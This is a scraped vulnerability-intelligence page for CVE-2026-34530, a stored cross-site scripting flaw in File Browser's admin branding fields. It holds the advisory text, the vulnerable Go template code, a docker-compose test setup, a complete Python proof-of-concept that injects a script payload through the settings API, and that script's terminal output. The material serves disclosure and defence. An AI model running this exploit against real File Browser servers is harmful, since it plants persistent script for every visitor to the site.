text-green-500">0.0</span></div><div class="h-2 bg-muted rounded-full overflow-hidden"><div class="h-full rounded-full transition-all bg-green-500" style="width:0%"></div></div></div><div class="pt-4 flex items-center gap-2"><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent bg-primary [a&]:hover:bg-primary/90 text-green-500">None</span></div></div></div><div data-slot="card" class="bg-card text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm overflow-hidden"><div class="h-1 bg-green-500"></div><div data-slot="card-header" class="@container/card-header grid auto-rows-min grid-rows-[auto_auto] items-start gap-1.5 px-6 has-data-[slot=card-action]:grid-cols-[1fr_auto] [.border-b]:pb-6 pb-2"><div data-slot="card-title" class="leading-none font-semibold flex items-center justify-between"><span class="flex items-center gap-2 text-base"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-trending-up h-4 w-4" aria-hidden="true"><path d="M16 7h6v6"></path><path d="m22 7-8.5 8.5-5-5L2 17"></path></svg>Exploitation Likelihood</span><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden [a&]:hover:bg-accent [a&]:hover:text-accent-foreground text-green-600">Minimal</span></div></div><div data-slot="card-content" class="px-6 space-y-5"><div class="flex items-center gap-6"><div class="flex-shrink-0"><div class="relative w-28 h-28"><svg class="w-28 h-28 transform -rotate-90" viewBox="0 0 100 100"><circle cx="50" cy="50" r="40" fill="none" stroke="currentColor" stroke-width="8" class="text-muted/30"></circle><circle cx="50" cy="50" r="40" fill="none" stroke="currentColor" stroke-width="8" stroke-linecap="round" stroke-dasharray="0 251" class="text-green-600"></circle></svg><div class="absolute inset-0 flex flex-col items-center justify-center"><span class="text-2xl font-bold text-green-600">0.00%</span><span class="text-[10px] text-muted-foreground uppercase tracking-wide">EPSS</span></div></div></div><div class="flex-1 space-y-3"><div><p class="text-sm text-muted-foreground">Very low probability of exploitation</p></div><div class="flex items-center gap-2 p-2 rounded-md bg-muted/50"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-target h-4 w-4 text-muted-foreground shrink-0" aria-hidden="true"><circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="6"></circle><circle cx="12" cy="12" r="2"></circle></svg><span class="text-sm font-medium">Monitor and patch as resources allow</span></div></div></div><div class="grid grid-cols-4 gap-2"><div class="p-3 rounded-lg text-center transition-colors bg-muted/50"><div class="text-lg font-bold">0.00%</div><div class="text-[10px] text-muted-foreground uppercase">EPSS</div></div><div class="p-3 rounded-lg text-center transition-colors bg-muted/50"><div class="text-lg font-bold">0.0</div><div class="text-[10px] text-muted-foreground uppercase">CVSS</div></div><div class="p-3 rounded-lg text-center transition-colors bg-green-500/10 border border-green-500/20"><div class="text-lg font-bold text-green-500">No</div><div class="text-[10px] text-muted-foreground uppercase">Exploit</div></div><div class="p-3 rounded-lg text-center transition-colors bg-green-500/10 border border-green-500/20"><div class="text-lg font-bold text-green-500">Yes</div><div class="text-[10px] text-muted-foreground uppercase">Patch</div></div></div><div class="flex items-start gap-3 p-3 rounded-lg bg-green-500/10 border border-green-500/20"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-triangle-alert h-4 w-4 mt-0.5 shrink-0 text-green-500" aria-hidden="true"><path d="m21.73 18-8-14a2 2 0 0 0-3.48 0l-8 14A2 2 0 0 0 4 21h16a2 2 0 0 0 1.73-3"></path><path d="M12 9v4"></path><path d="M12 17h.01"></path></svg><div class="flex-1 min-w-0"><div class="font-semibold text-sm">Low Priority</div><div class="text-xs text-muted-foreground mt-0.5">no major risk factors</div></div></div><p class="text-[11px] text-muted-foreground leading-relaxed"><strong>EPSS</strong> predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.</p></div></div><div data-slot="card" class="bg-card text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm"><div data-slot="card-header" class="@container/card-header grid auto-rows-min grid-rows-[auto_auto] items-start gap-1.5 px-6 has-data-[slot=card-action]:grid-cols-[1fr_auto] [.border-b]:pb-6"><div data-slot="card-title" class="leading-none font-semibold">Description</div></div><div data-slot="card-content" class="px-6"><div class="cve-description text-muted-foreground leading-relaxed prose prose-sm dark:prose-invert max-w-none break-words [word-break:break-word] [overflow-wrap:anywhere]"><h3>Summary</h3> <p>The SPA index page in File Browser is vulnerable to Stored Cross-site Scripting (XSS) via admin-controlled branding fields. An admin who sets <code>branding.name</code> to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users.</p> <br/> <h3>Details</h3> <p><code>http/static.go</code> renders the SPA <code>index.html</code> using Go's <code>text/template</code> (NOT <code>html/template</code>) with custom delimiters <code>[{[</code> and <code>]}]</code>. Branding fields are inserted directly into HTML without any escaping:</p> <pre><code class="language-go">// http/static.go, line 16 — imports text/template instead of html/template "text/template" // http/static.go, line 33 — branding.Name passed into template data "Name": d.settings.Branding.Name, // http/static.go, line 97 — template parsed with custom delimiters, no escaping index := template.Must(template.New("index").Delims("[{[", "]}]").Parse(string(fileContents))) </code></pre> <p>The frontend template (<code>frontend/public/index.html</code>) embeds these fields directly:</p> <pre><code class="language-html"> [{[ if .Name -]}][{[ .Name ]}][{[ else ]}]File Browser[{[ end ]}]  content="[{[ if .Color -]}][{[ .Color ]}][{[ else ]}]#2979ff[{[ end ]}]" </code></pre> <p>Since <code>text/template</code> performs NO HTML escaping (unlike <code>html/template</code>), setting <code>branding.name</code> to <code></title><script>alert(1)</script></code> breaks out of the <code><title></code> tag and injects arbitrary script into every page load.</p> <p>Additionally, when ReCaptcha is enabled, the <code>ReCaptchaHost</code> field is used as:</p> <pre><code class="language-html"><script src="[{[.ReCaptchaHost]}]/recaptcha/api.js"></script> </code></pre> <p>This allows loading arbitrary JavaScript from an admin-chosen origin.</p> <p>No <code>Content-Security-Policy</code> header is set on the SPA entry point, so there is no CSP mitigation.</p> <br/> <h3>PoC</h3> <p>Below is the PoC python script that could be ran on test environment using docker compose:</p> <template id="P:a"></template> <template id="P:b"></template> <template id="P:c"></template> <template id="P:d"></template> <template id="P:e"></template> <br/> <template id="P:f"></template> <template id="P:10"></template></div></div></div><div data-slot="card" class="bg-card text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm"><div data-slot="card-header" class="@container/card-header grid auto-rows-min grid-rows-[auto_auto] items-start gap-1.5 px-6 has-data-[slot=card-action]:grid-cols-[1fr_auto] [.border-b]:pb-6"><div data-slot="card-title" class="leading-none font-semibold">CVSS v3 Breakdown</div></div><div data-slot="card-content" class="px-6"><div class="grid grid-cols-2 gap-4 text-sm"><div><span class="text-muted-foreground">Attack Vector:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">Attack Complexity:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">Privileges Required:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">User Interaction:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">Scope:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">Confidentiality:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">Integrity:</span><span class="ml-2 font-medium">-</span></div><div><span class="text-muted-foreground">Availability:</span><span class="ml-2 font-medium">-</span></div></div></div></div></div><div class="space-y-6"><div data-slot="card" class="bg-card text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm"><div data-slot="card-header" class="@container/card-header grid auto-rows-min grid-rows-[auto_auto] items-start gap-1.5 px-6 has-data-[slot=card-action]:grid-cols-[1fr_auto] [.border-b]:pb-6"><div data-slot="card-title" class="leading-none font-semibold flex items-center gap-2"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-triangle-alert h-5 w-5" aria-hidden="true"><path d="m21.73 18-8-14a2 2 0 0 0-3.48 0l-8 14A2 2 0 0 0 4 21h16a2 2 0 0 0 1.73-3"></path><path d="M12 9v4"></path><path d="M12 17h.01"></path></svg>Trend Analysis</div></div><div data-slot="card-content" class="px-6"><span data-slot="badge" class="inline-flex items-center justify-center rounded-md border px-2 py-0.5 text-xs font-medium w-fit whitespace-nowrap shrink-0 [&>svg]:size-3 gap-1 [&>svg]:pointer-events-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive transition-[color,box-shadow] overflow-hidden border-transparent [a&]:hover:bg-primary/90 bg-purple-500 text-white">Neutral</span></div></div><div data-slot="card" class="bg-card text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm"><div data-slot="card-header" class="@container/card-header grid auto-rows-min grid-rows-[auto_auto] items-start gap-1.5 px-6 has-data-[slot=card-action]:grid-cols-[1fr_auto] [.border-b]:pb-6"><div data-slot="card-title" class="leading-none font-semibold">Advisories</div></div><div data-slot="card-content" class="px-6"><div class="space-y-2"><a href="https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv" target="_blank" rel="noopener noreferrer" class="flex items-center gap-2 text-sm text-muted-foreground hover:text-foreground transition-colors p-2 rounded-md hover:bg-muted"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-external-link h-4 w-4 shrink-0" aria-hidden="true"><path d="M15 3h6v6"></path><path d="M10 14 21 3"></path><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path></svg><span class="truncate">GitHub Advisory</span></a></div></div></div></div></div></div><script>$RS("S:8","P:8")</script><div hidden id="S:9"><div class="mt-8"><div data-slot="card" class="text-card-foreground flex flex-col gap-6 rounded-xl border py-6 shadow-sm bg-muted/30 border-muted"><div data-slot="card-content" class="p-5"><div class="flex items-center gap-2 mb-4"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-quote h-5 w-5 text-primary" aria-hidden="true"><path d="M16 3a2 2 0 0 0-2 2v6a2 2 0 0 0 2 2 1 1 0 0 1 1 1v1a2 2 0 0 1-2 2 1 1 0 0 0-1 1v2a1 1 0 0 0 1 1 6 6 0 0 0 6-6V5a2 2 0 0 0-2-2z"></path><path d="M5 3a2 2 0 0 0-2 2v6a2 2 0 0 0 2 2 1 1 0 0 1 1 1v1a2 2 0 0 1-2 2 1 1 0 0 0-1 1v2a1 1 0 0 0 1 1 6 6 0 0 0 6-6V5a2 2 0 0 0-2-2z"></path></svg><span class="font-semibold text-sm uppercase tracking-wide">Cite This Page</span></div><div class="space-y-4"><div><div class="flex items-center justify-between mb-2"><span class="text-xs font-medium text-muted-foreground uppercase tracking-wide">APA Format</span><button data-slot="button" class="inline-flex items-center justify-center whitespace-nowrap font-medium transition-all disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg:not([class*='size-'])]:size-4 shrink-0 [&_svg]:shrink-0 outline-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive hover:bg-accent hover:text-accent-foreground dark:hover:bg-accent/50 rounded-md gap-1.5 px-3 has-[>svg]:px-2.5 h-7 text-xs"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-copy h-3 w-3 mr-1" aria-hidden="true"><rect width="14" height="14" x="8" y="8" rx="2" ry="2"></rect><path d="M4 16c-1.1 0-2-.9-2-2V4c0-1.1.9-2 2-2h10c1.1 0 2 .9 2 2"></path></svg>Copy</button></div><div class="bg-background rounded-md p-3 text-sm font-mono text-muted-foreground border">Strobes VI. (2026). CVE-2026-34530 - CVE Details and Analysis. Strobes VI. Retrieved April 2, 2026, from https://vi.strobes.co/cve/CVE-2026-34530</div></div><div class="flex items-center justify-between pt-2 border-t"><span class="text-xs text-muted-foreground">Quick copy link + title</span><button data-slot="button" class="inline-flex items-center justify-center whitespace-nowrap font-medium transition-all disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg:not([class*='size-'])]:size-4 shrink-0 [&_svg]:shrink-0 outline-none focus-visible:border-ring focus-visible:ring-ring/50 focus-visible:ring-[3px] aria-invalid:ring-destructive/20 dark:aria-invalid:ring-destructive/40 aria-invalid:border-destructive border bg-background shadow-xs hover:bg-accent hover:text-accent-foreground dark:bg-input/30 dark:border-input dark:hover:bg-input/50 rounded-md gap-1.5 px-3 has-[>svg]:px-2.5 h-7 text-xs"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-copy h-3 w-3 mr-1" aria-hidden="true"><rect width="14" height="14" x="8" y="8" rx="2" ry="2"></rect><path d="M4 16c-1.1 0-2-.9-2-2V4c0-1.1.9-2 2-2h10c1.1 0 2 .9 2 2"></path></svg>Copy Link</button></div></div><p class="text-xs text-muted-foreground mt-4 pt-4 border-t">Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.</p></div></div></div></div><script>$RS("S:9","P:9")</script><div hidden id="S:a"><pre><code class="language-yaml">services: filebrowser: image: filebrowser/filebrowser:v2.62.1 user: 0:0 ports: - "80:80" </code></pre></div><script>$RS("S:a","P:a")</script><div hidden id="S:b"><p>And running this PoC python script:</p></div><script>$RS("S:b","P:b")</script><div hidden id="S:c"><pre><code class="language-python">import argparse import json import sys import requests BANNER = """ Stored XSS via Branding Injection PoC Affected: filebrowser/filebrowser <=v2.62.1 Root cause: http/static.go uses text/template (not html/template) Branding fields rendered unescaped into SPA index.html """ XSS_MARKER = "XSS_BRANDING_POC_12345" XSS_PAYLOAD = ( '</title><script>window.' + XSS_MARKER + '=1;' 'alert("XSS in File Browser branding")</script><title>' ) def login(base: str, username: str, password: str) -> str: r = requests.post(f"{base}/api/login", json={"username": username, "password": password}, timeout=10) if r.status_code != 200: print(f" Login failed: {r.status_code}") sys.exit(1) return r.text.strip('"') def main(): sys.stdout.write(BANNER) sys.stdout.flush() ap = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description="Stored XSS via branding injection PoC", epilog="""examples: %(prog)s -t http://localhost -u admin -p admin %(prog)s -t http://target.com/filebrowser -u admin -p secret how it works: 1. Authenticates as admin to File Browser 2. Sets branding.name to a <script> payload via PUT /api/settings 3. Fetches the SPA index (unauthenticated) to verify the payload renders unescaped in the HTML <title> tag root cause: http/static.go renders the SPA index.html using Go's text/template (NOT html/template) with custom delimiters [{[ and ]}]. Branding fields like Name are inserted directly into HTML: <title>[{[.Name]}]</title> No escaping is applied, so HTML/JS in the name breaks out of the <title> tag and executes as script. impact: Stored XSS affecting ALL visitors (including unauthenticated). An admin (or attacker who compromised admin) can inject persistent JavaScript that steals credentials from every user who visits.""", ) ap.add_argument("-t", "--target", required=True, help="Base URL of File Browser (e.g. http://localhost)") ap.add_argument("-u", "--user", required=True, help="Admin username") ap.add_argument("-p", "--password", required=True, help="Admin password") if len(sys.argv) == 1: ap.print_help() sys.exit(1) args = ap.parse_args() base = args.target.rstrip("/") hdrs = lambda tok: {"X-Auth": tok, "Content-Type": "application/json"} print() print("[*] ATTACK BEGINS...") print("====================") print(f"\n [1] Authenticating to {base}") token = login(base, args.user, args.password) print(f" Logged in as: {args.user}") print(f"\n [2] Injecting XSS payload into branding.name") r = requests.get(f"{base}/api/settings", headers=hdrs(token), timeout=10) if r.status_code != 200: print(f" Failed: GET /api/settings returned {r.status_code}") print(f" (requires admin privileges)") sys.exit(1) settings = r.json() settings["branding"]["name"] = XSS_PAYLOAD r = requests.put(f"{base}/api/settings", headers=hdrs(token), json=settings, timeout=10) if r.status_code != 200: print(f" Failed: PUT /api/settings returned {r.status_code}") sys.exit(1) print(f" Payload injected") print(f"\n [3] Verifying XSS renders in unauthenticated SPA") r = requests.get(f"{base}/", timeout=10) html = r.text if XSS_MARKER in html: print(f" XSS payload found in HTML response!") for line in html.split("\n"): if XSS_MARKER in line: print(f" >>> {line.strip()[:120]}") csp = r.headers.get("Content-Security-Policy", "") if not csp: print(f" No CSP header — script executes without restriction") confirmed = True else: print(f" Payload NOT found in HTML") confirmed = False print() print("====================") if confirmed: print() print("CONFIRMED: text/template renders branding.name without escaping.") print("The <title> tag is broken and arbitrary <script> executes.") print("Every visitor (authenticated or not) receives the payload.") print() print(f"Open {base}/ in a browser to see the alert() popup.") else: print() print("NOT CONFIRMED in this test run.") print() if __name__ == "__main__": main() </code></pre></div><script>$RS("S:c","P:c")</script><div hidden id="S:d"><p>And terminal output:</p></div><script>$RS("S:d","P:d")</script><div hidden id="S:e"><pre><code class="language-bash">root@server205:~/sec-filebrowser# python3 poc_branding_xss.py -t http://localhost -u admin -p "jhSR9z9pofv5evlX" Stored XSS via Branding Injection PoC Affected: filebrowser/filebrowser <=v2.62.1 Root cause: http/static.go uses text/template (not html/template) Branding fields rendered unescaped into SPA index.html [*] ATTACK BEGINS... ==================== [1] Authenticating to http://localhost Logged in as: admin [2] Injecting XSS payload into branding.name Payload injected [3] Verifying XSS renders in unauthenticated SPA XSS payload found in HTML response! >>> </title><script>window.XSS_BRANDING_POC_12345=1;alert("XSS in File Browser branding")</script><title> >>> window.FileBrowser = {"AuthMethod":"json","BaseURL":"","CSS":false,"Color":"","DisableExternal":false,"DisableUsedPercen No CSP header — script executes without restriction ==================== CONFIRMED: text/template renders branding.name without escaping. The <title> tag is broken and arbitrary <script> executes. Every visitor (authenticated or not) receives the payload. Open http://localhost/ in a browser to see the alert() popup. </code></pre></div><script>$RS("S:e","P:e")</script><div hidden id="S:f"><h3>Impact</h3></div><script>$RS("S:f","P:f")</script><div hidden id="S:10"><ul> <li>Stored XSS affecting ALL visitors including unauthenticated users</li> <li>Persistent backdoor — the payload survives until branding is manually changed</li> </ul></div><script>$RS("S:10","P:10")</script><script>$RB=[];$RV=function(a){$RT=performance.now();for(var b=0;b<a.length;b+=2){var c=a[b],e=a[b+1];null!==e.parentNode&&e.parentNode.removeChild(e);var f=c.parentNode;if(f){var g=c.previousSibling,h=0;do{if(c&&8===c.nodeType){var d=c.data;if("/$"===d||"/&"===d)if(0===h)break;else h--;else"$"!==d&&"$?"!==d&&"$~"!==d&&"$!"!==d&&"&"!==d||h++}d=c.nextSibling;f.removeChild(c);c=d}while(c);for(;e.firstChild;)f.insertBefore(e.firstChild,c);g.data="$";g._reactRetry&&requestAnimationFrame(g._reactRetry)}}a.length=0}; $RC=function(a,b){if(b=document.getElementById(b))(a=document.getElementById(a))?(a.previousSibling.data="$~",$RB.push(a,b),2===$RB.length&&("number"!==typeof $RT?requestAnimationFrame($RV.bind(null,$RB)):(a=performance.now(),setTimeout($RV.bind(null,$RB),2300>a&&2E3<a?2300-a:$RT+300-a)))):b.parentNode.removeChild(b)};$RC("B:1","S:1")</script><title>CVE-2026-34530 - CVE Details, Severity, and Analysis | Strobes VI